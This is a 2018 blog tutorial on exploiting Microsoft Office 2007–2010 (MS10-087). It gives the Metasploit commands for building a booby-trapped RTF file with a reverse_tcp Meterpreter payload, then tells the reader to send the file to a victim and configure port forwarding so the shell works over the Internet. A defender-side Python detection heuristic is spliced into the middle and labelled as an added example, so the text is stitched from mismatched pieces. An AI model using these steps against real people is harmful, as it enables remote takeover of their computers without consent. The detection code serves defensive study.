Wednesday, December 26, 2018

Exploit Microsoft Office 2007 - 2010 vulnerability using Metasploit

This attack exploits a vulnerability in Microsoft Office 2007 to 2010. Basically, I am going to show you how to create a rich text format (.rtf) file with an exploit embedded in it. When the victim opens the file in Microsoft Word, Word loads the file and crashes. Once Word on the victim's computer has crashed, you gain a shell and have full control of the victim's computer.

1. Turn on your Kali Linux machine

2. Open the terminal, type in msfconsole and press Enter. Wait for Metasploit to load (it could take a while).

3. Once Metasploit has loaded completely, type in the command below:

use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

4. Now we need to set the Meterpreter payload by typing in the following command:

set payload windows/meterpreter/reverse_tcp

5. This step is optional but recommended because it shows you the options available for this exploit, including the name of the file that will be generated, LHOST, LPORT, etc. You can view the options by typing in show options and pressing Enter.

6. Now choose the name of the .rtf file to be generated by typing in the command set FILENAME filename.rtf and pressing Enter, where filename.rtf is the name you want for the file.

7. Now we need to set the local host (LHOST). This is the system that will be listening when the victim opens the file and the payload executes on their computer. To set LHOST you must first get your Kali machine's IP address. To do this, open a new terminal, type in ifconfig and press Enter. You should now see output like the screenshot below. Copy the IP address.

8. Go back to the Metasploit console and paste the IP address into the command shown below.

set LHOST 192.168.30.132 and press Enter

9. Before we exploit the victim's system, let's check that all of our options are set properly. Type in show options and press Enter.

10. Now you are ready to run the exploit. Simply type in exploit and press Enter.

11. The file has now been generated and is located in the /root/.msf4/local directory (in my case it is /root/.msf4/local/greeting.rtf). I recommend navigating to that directory and copying the exploit file to the Desktop, as I have below.

Just type in cd /root/.msf4/local and press Enter to move to the directory containing the exploit, then execute the following command:

cp /root/.msf4/local/filename.rtf /root/Desktop

In my case, it is cp /root/.msf4/local/greeting.rtf /root/Desktop

You should now see a copy of the exploit on your Kali Desktop. Upload this file to a file hosting service, generate a link and send it to the victim via chat or email. Once the victim has downloaded and opened the file, BOOM, you own their computer. From here you can navigate their computer from the Metasploit console; just type in shell and press Enter to drop into a shell.
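From the defender's side, the point worth taking away is what the generated file looks like on disk. The module name above (ms10_087_rtf_pfragments_bof) tells you which RTF construct the vulnerable code path handles: the pFragments shape property. The following is an added example, not code from this post or from the Metasploit project: a small Python triage heuristic that decodes RTF hex escapes (a common way to split a keyword so naive matching misses it), looks for a pFragments property, and reports how large the accompanying property value is. The threshold MAX_SANE_SV_LEN, the verdict names and the sample documents are my own assumptions and constructions, not values from the page or from any real sample.

```python
"""Heuristic triage of RTF files for the MS10-087 pFragments pattern.

Added example for this page, not code from the original post or from the
Metasploit project. It is a defender-side static heuristic: it does not parse
RTF completely, it only looks for the shape-property construct named by the
exploit module (pFragments) and reports how large the property value is.
"""
import re

# RTF hex escapes (\'hh) are a common way to split a keyword so that naive
# string matching misses it; decode them before matching.
HEX_ESC = re.compile(rb"\\'([0-9a-fA-F]{2})")

# Shape-property syntax in RTF is {\sp{\sn NAME}{\sv VALUE}}; the property
# name handled by the vulnerable code path is pFragments.
PFRAGMENTS_RE = re.compile(rb"\\sn\s*pFragments\b", re.IGNORECASE)
SV_RE = re.compile(rb"\\sv\s*([^}]*)\}", re.DOTALL)

# Assumption: a legitimate pFragments value is short; anything much longer is
# treated as a likely overflow attempt. Tune this to your environment.
MAX_SANE_SV_LEN = 64


def normalize_rtf_escapes(data: bytes) -> bytes:
    """Replace \\'hh hex escapes with the raw byte so keywords can be matched."""
    return HEX_ESC.sub(lambda m: bytes.fromhex(m.group(1).decode("ascii")), data)


def triage_rtf(data: bytes) -> dict:
    """Return findings for one RTF document given as bytes."""
    findings = {
        "is_rtf": data.lstrip().startswith(b"{\\rtf"),
        "has_pfragments": False,
        "max_sv_len": 0,
        "verdict": "clean",
    }
    if not findings["is_rtf"]:
        findings["verdict"] = "not-rtf"
        return findings

    text = normalize_rtf_escapes(data)
    for match in PFRAGMENTS_RE.finditer(text):
        findings["has_pfragments"] = True
        # Only look at the \sv value that follows this property name.
        sv = SV_RE.search(text, match.end())
        if sv:
            findings["max_sv_len"] = max(findings["max_sv_len"], len(sv.group(1)))

    if findings["has_pfragments"]:
        # pFragments is rare in legitimate documents, so its presence alone is
        # worth a look; an oversized value is the stronger signal.
        findings["verdict"] = (
            "likely-exploit" if findings["max_sv_len"] > MAX_SANE_SV_LEN
            else "suspicious"
        )
    return findings


# Constructed samples (not real malware): a benign document, a document using
# the property with an oversized value, and the same with a hex-escaped keyword.
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report\\par}"
OVERSIZED_RTF = (
    b"{\\rtf1{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}{\\sv 1;1;"
    + b"41" * 400 + b"}}}}}"
)
ESCAPED_RTF = (
    b"{\\rtf1{\\sp{\\sn pFr\\'61gments}{\\sv 1;1;" + b"41" * 100 + b"}}}"
)

if __name__ == "__main__":
    samples = [("benign", BENIGN_RTF), ("oversized", OVERSIZED_RTF), ("escaped", ESCAPED_RTF)]
    for name, sample in samples:
        print(name, triage_rtf(sample))
```

This is a triage aid for mail gateways or incident response, not a substitute for patching: the real mitigation for the Office versions named in this post is applying the vendor update for MS10-087. Because the check runs on raw bytes after escape decoding, it also catches the escaped-keyword variant shown in the constructed samples, which a plain substring search for "pFragments" would miss.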

Note that what I just showed you only works on a LAN and not over a WAN or the Internet. For this to work over the Internet, you will need to go into your router and configure port forwarding. To learn more about port forwarding, click here.
